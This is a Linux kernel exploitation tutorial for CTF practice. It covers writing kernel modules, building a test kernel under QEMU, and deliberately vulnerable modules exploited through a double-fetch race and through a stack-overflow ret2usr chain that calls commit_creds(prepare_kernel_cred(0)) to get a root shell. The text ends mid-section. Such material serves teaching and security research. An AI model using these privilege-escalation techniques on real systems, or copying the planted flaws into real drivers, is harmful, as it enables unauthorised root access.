1 of 19

Kernel

Heavily beta

Introduction

The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.

In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.

You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow , and I recommend it highly.

Kernel Modules

Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r, my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often loaded into /dev/* or /proc/. There are 3 main module types: Char, Block and Network.

Char Modules

Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.

Examples of Char modules include /dev/random.

I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!

Writing a Char Module

The Code

Writing a Char Module is suprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.

#include <linux/init.h>
#include <linux/module.h>

MODULE_LICENSE("Mine!");

static int intro_init(void) {
    printk(KERN_ALERT "Custom Module Started!\n");
    return 0;
}

static void intro_exit(void) {
    printk(KERN_ALERT "Custom Module Stopped :(\n");
}

module_init(intro_init);
module_exit(intro_exit);

It looks simple, because it is simple. For now, anyway.

First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note we put parameters as void, this is because kernel modules are very picky about requiring parameters (even if just void).

We then register the purposes of the functions using module_init() and module_exit().

Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of message sent, and there are many more types.

Compiling

Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:

obj-m += intro.o
 
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

$(MAKE) is a special flag that effectively calls make, but it propagate all same flags that our Makefile was called with. So, for example, if we call

$ make -j 8

Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.

Using the Kernel Module

Now we've got a ko file compiled, we can add it to the list of active modules:

$ sudo insmod test.ko

If it's successful, there will be no response. But where did it print to?

Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.

$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!

Here we grab the last line using tail - as you can see, our printk is called!

Now let's unload the module:

$ sudo rmmod test
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(

And there our intro_exit is called.

You can view currently loaded modules using the lsmod command

An Interactive Char Driver

Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.

Exposing it to the File System

This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:

A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.

We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.

Note that on an error it calls class_destroy and unregister_chrdev:

Cleaning it Up

These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:

Controlling I/O

In intro_init, the first line may have been confusing:

The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:

The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:

We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!

Full Code

Testing The Module

Create a really basic exploit.c:

If the module is successfully loaded, the read() call should read QWERTY into buffer:

Success!

Interactivity with IOCTL

A more useful way to interact with the driver

Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:

File Descriptor fd
an unsigned int
an unsigned long

The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:

But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.

To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:

And you would have to update the file_operations struct:

A Basic Kernel Interaction Challenge

The Module

We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:

If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.

In order to update authenticated, we have to write() to the kernel module. What we attempt to write it compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!

Interacting

Let's first try and interact with the kernel by reading from it.

Make sure you sudo chmod 666 /dev/authentication!

We'll start by opening the device and reading from it.

Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.

After compiling, we get that we are not authenticated:

Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!

It works!

Amazing! Now for something really important:

The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).

Final Code

Challenge - IOCTL

So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.

Compiling, Customising and booting the Kernel

Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.

Prerequisites

$ apt-get install flex bison libelf-dev

There may be other requirements, I just already had them. Check here for the full list.

The Kernel

Cloning

git clone https://github.com/torvalds/linux --depth=1

Use --depth 1 to only get the last commit.

Customise

Remove the current compilation configurations, as they are quite complex for our needs

$ cd linux
$ rm -f .config

Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

$ make allnoconfig
  YACC    scripts/kconfig/parser.tab.[ch]
  HOSTCC  scripts/kconfig/lexer.lex.o
  HOSTCC  scripts/kconfig/menu.o
  HOSTCC  scripts/kconfig/parser.tab.o
  HOSTCC  scripts/kconfig/preprocess.o
  HOSTCC  scripts/kconfig/symbol.o
  HOSTCC  scripts/kconfig/util.o
  HOSTLD  scripts/kconfig/conf
#
# configuration written to .config
#

We create a kconfig file with the options we want to enable. An example is the following:

CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y

CONFIG_PCI=y

# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y

# This is for /dev file system.
CONFIG_DEVTMPFS=y

# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y

CONFIG_MODULES=y

CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y

CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y

CONFIG_USERFAULTFD=y

Explanation of Options

CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

In order to update the minimal .config with these options, we use the provided merge_config.sh script:

$ scripts/kconfig/merge_config.sh .config ../kconfig

Building

$ make -j4

That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

Kernel Modules

When we compile kernel modules for our own kernel, we use the following Makefile structure:

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

all:
    make -C /home/ir0nstone/linux M=$(PWD) modules

The module is now compiled for the specific kernel version!

Booting the Kernel in a Virtual Machine

References

Creating the File System and Executables

We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

We will download and extract busybox; you can find the latest version here.

$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -

We also create an output folder for compiled versions.

$ mkdir busybox_compiled

Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig

Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.

Now, make it with the new options

$ cd ../busybox_compiled
$ make -j
$ make install

Now we make the file system.

$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/

The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
 
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
 
exec /bin/sh

Make it executable

$ chmod +x init

Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio

The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises

If we want to extract the cpio archive (say, during a CTF) we can use this command:

$ cpio -i -F initramfs.cpio

Loading it with QEMU

Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Explanation of Flags

-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
- console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
- quiet - Only showing critical messages from the kernel
- loglevel=3 - Only show error messages and higher-priority messages
- oops=panic - Make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

Once we make this executable and run it, we get loaded into a VM!

User Accounts

Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:

~ # whoami
whoami: unknown uid 0

This is because /etc/passwd and /etc/group don't exist, so we can just create those!

/etc/passwd

root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh

/etc/group

root:x:0:
user:x:1000:

Loading the Kernel Module

The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

#!/bin/sh

insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch

mount -t proc none /proc
mount -t sysfs none /sys

mknod -m 666 /dev/ttyS0 c 4 64

setsid /bin/cttyhack setuidgid 1000 /bin/sh

Here I am assuming that the major number of the double_fetch module is 253.

Why am I doing that?

If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!

Compiling a Different Kernel Version

If we want to compile a kernel version that is not the latest, we'll dump all the tags:

$ git fetch --tags

It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

$ git checkout v5.11

We then continue from there.

Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.

Double-Fetch

The most simple of vulnerabilities

A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.

A Vulnerable Kernel Module

Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.

The code below will be the contents of the read() function of a kernel. I've removed the boilerplate code mentioned previously, but here are the relevant parts:

#define PASSWORD    "p4ssw0rd"

typedef struct {
    int id;
    char password[10];
} Credentials;

static int id = 1001;

static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    Credentials *creds = (Credentials *)buf;

    printk(KERN_INFO "[Double-Fetch] Reading password from user...");

    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }

    // to increase reliability
    msleep(1000);

    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }

    printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
    return -1;
}

The program will:

Check if the ID we are attempting to switch to is 0
- If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
- If it is, it will set the id variable to the id in the creds structure

Simple Communication

Let's say we want to communicate with the module, and we set up a simple C program to do so:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");

    int res_id = write(fd, &creds, 0);    // last parameter here makes no difference
    printf("New ID: %d\n", res_id);

    return 0;
}

We compile this statically (as there are no shared libraries on our VM):

gcc -static -o exploit exploit.c

As expected, the id variable gets set to 900 - we can check this in dmesg:

$ dmesg
[...]
[    3.104165] [Double-Fetch] Password correct! ID set to 900

That all works fine.

Exploiting a Double-Fetch and Switching to ID 0

The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:

Credentials *creds = (Credentials *)buf;

This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.

Because this struct is controlled by the user, they have the power to change it whenever they like.

The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):

if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;
}

And once more, to set the id variable:

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;
}

Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.

A Proof-of-Concept: Switching to ID 0

Inbetween the two dereferences creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.

Here's the plan, visually, if it helps:

In the waiting period, we swap out the id.

If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we most onto part 2, with no sleep, we require multiple cores.

The C program will hang on write until the kernel module returns, so we can't use the main thread.

With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!

// gcc -static -o exploit -pthread exploit.c

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void *switcher(void *arg);

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    // communicate with the module
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    // use a random ID and set the password correctly
    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");

    // set up the switcher thread
    // pass it a pointer to `creds`, so it can modify it
    pthread_t thread;

    if (pthread_create(&thread, NULL, switcher, &creds)) {
        fprintf(stderr, "Error creating thread\n");
        return -1;
    }

    // now we write the cred struct to the module
    // it should be swapped after about .3 seconds by switcher
    int res_id = write(fd, &creds, 0);

    // write returns the id we switched to
    // if all goes well, that is 0
    printf("New ID: %d\n", res_id);

    // finish thread cleanly
    if (pthread_join(thread, NULL)) {
        fprintf(stderr, "Error joining thread\n");
        return -1;
    }

    return 0;
}

void *switcher(void *arg) {
    Credentials *creds = (Credentials *)arg;

    // wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
    sleep(0.3);

    creds->id = 0;
}

We have to compile it statically, as the VM has no shared libraries.

$ gcc -static -o exploit -pthread exploit.c

Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):

$ cpio -i -F initramfs.cpio

Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:

$ find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio

Use the newly-created initramfs.cpio to lauch the VM with run.sh. Executing exploit, it is successful!

~ # ./exploit 
FD: 3
New ID: 0

Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.

Double-Fetch without Sleep

Removing the artificial sleep

Overview

In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!

This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0 to the ID, and another that writes another value - e.g. 900 - and then calling write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".

Analysis

If we check the source, we can see that there is no msleep any longer:

if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;
}

printk("[Double-Fetch] Attempting login...");

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;
}

Exploitation

Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:

Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");

Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:

// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
    // now we write the cred struct to the module
    res_id = write(fd, &creds, 0);

    // if res_id is 0, stop the race
    if (!res_id) {
        puts("[+] ID is 0!");
        break;
    }
}

If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.

Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).

void *switcher(void *arg) {
    volatile Credentials *creds = (volatile Credentials *)arg;

    while (1) {
        creds->id = 0;
        creds->id = 900;
    }
}

Compile the exploit and run it, we get the desired result:

~ $ ./exploit 
FD: 3
[    2.140099] [Double-Fetch] Attempted to log in as root!
[    2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race

Look how quick that was! Insane - two fails, then a success!

Race Analysis

You might be wondering how tight the race window can be for exploitation - well, gnote from TokyoWesterns CTF 2019 had a race of two assembly instructions:

; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax

The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!

The Ultimate Aim of Kernel Exploitation - Process Credentials

Overview

Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.

To understand this, we have a talk a little about how privileges and credentials work in Linux.

The cred struct

The cred struct contains all the permissions a task holds. The ones that we care about are typically these:

struct cred {
	/* ... */
	
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	
	/* ... */
} __randomize_layout;

These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.

Note the __randomize_layout here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!

task_struct

The kernel needs to store information about each running task, and to do this it uses the task_struct structure. Each kernel task has its own instance.

struct task_struct {
    	/* ... */
    
	/*
	 * Pointers to the (original) parent process, youngest child, younger sibling,
	 * older sibling, respectively.  (p->father can be replaced with
	 * p->real_parent->pid)
	 */

	/* Real parent process: */
	struct task_struct __rcu	*real_parent;

	/* Recipient of SIGCHLD, wait4() reports: */
	struct task_struct __rcu	*parent;

	/*
	 * Children/sibling form the list of natural children:
	 */
	struct list_head		children;
	struct list_head		sibling;
	struct task_struct		*group_leader;

	/* ... */    

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

    	/* ... */
};

The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.

Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained here:

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */

In effect, cred is the permission when we are trying to act on something, and real_cred when something it trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred but not real_cred.

So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.

Once I work it out, I shall update this (TODO!).

prepare_kernel_cred() and commit_creds()

As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.

prepare_kernel_cred()

The function can be found here, but there's not much to say - it creates a new cred struct called new then destroys the old. It returns new.

If NULL is passed as the argument, it will return a new set of credentials that match the init_task credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!

This last part is actually not true on newer kernel versions - check out Debugging the Kernel Module section!

commit_creds()

This function is found here, but ultimately it will update task->real_cred and task->cred to the new credentials:

rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);

Resources and References

Kernel ROP - ret2usr

ROPpety boppety, but now in the kernel

Introduction

By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.

The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.

Vulnerable Module

Note that the kernel version here is 6.1, due to some added protections we will come to later.

The relevant code is here:

static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    char buffer[0x20];

    printk(KERN_INFO "Testing...");
    memcpy(buffer, buf, 0x100);

    printk(KERN_INFO "Yes? %s", buffer);

    return 0;
}

As we can see, it's a size 0x100 memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by make and the entire function just becomes xor eax, eax; ret!

Exploitation

Assembly to escalate privileges

Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.

For obvious reasons, you require root permissions to read this file!

~ # cat /proc/kallsyms | grep cred
[...]
ffffffff81066e00 T commit_creds
ffffffff81066fa0 T prepare_kernel_cred
[...]

Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):

xor    rdi, rdi
mov    rcx, 0xffffffff81066fa0
call   rcx

Then we call commit_creds() on the result (which is stored in RAX):

mov    rdi, rax
mov    rcx, 0xffffffff81066e00
call   rcx

We can throw this directly into the C code using inline assembly:

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	"call rcx;"
        
        "mov rdi, rax;"
	"movabs rcx, 0xffffffff81066e00;"   // commit_creds
	"call rcx;"
    );
}

Overflow

The next step is overflowing. The 7th qword overwrites RIP:

// overflow
uint64_t payload[7];

payload[6] = (uint64_t) escalate;

write(fd, payload, 0);

Finally, we create a get_shell() function we call at the end, once we've escalated privileges:

void get_shell() {
    system("/bin/sh");
}

int main() {
    // [ everything else ]
    
    get_shell();
}

Returning to userland

If we run what we have so far, we fail and the kernel panics. Why is this?

The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).

What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!

We can store them as follows:

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags

void save_state() {
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:

uint64_t user_rip = (uint64_t) get_shell;

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	"call rcx;"
        
        "mov rdi, rax;"
	"movabs rcx, 0xffffffff81066e00;"   // commit_creds
	"call rcx;"

        // restore all the registers
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.

If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!

$ gcc -static -o exploit exploit.c
[...]
$ ./run.sh
~ $ ./exploit 
[*] Saving state
[+] Saved state
FD: 3
[*] Returned to userland
~ # id
uid=0(root) gid=0(root)

We have successfully exploited a ret2usr!

Understanding the restoration

How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.

GS - limited segmentation. The contents of the GS register are swapped one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.
- Has to swap back to user space
SS - Stack Segment
- Defines where the stack is stored
- Must be reverted back to the userland stack
RSP
- Same as above, really
CS - Code Segment
- Defines the memory location that instructions are stored in
- Must point to our user space code
RFLAGS - various things

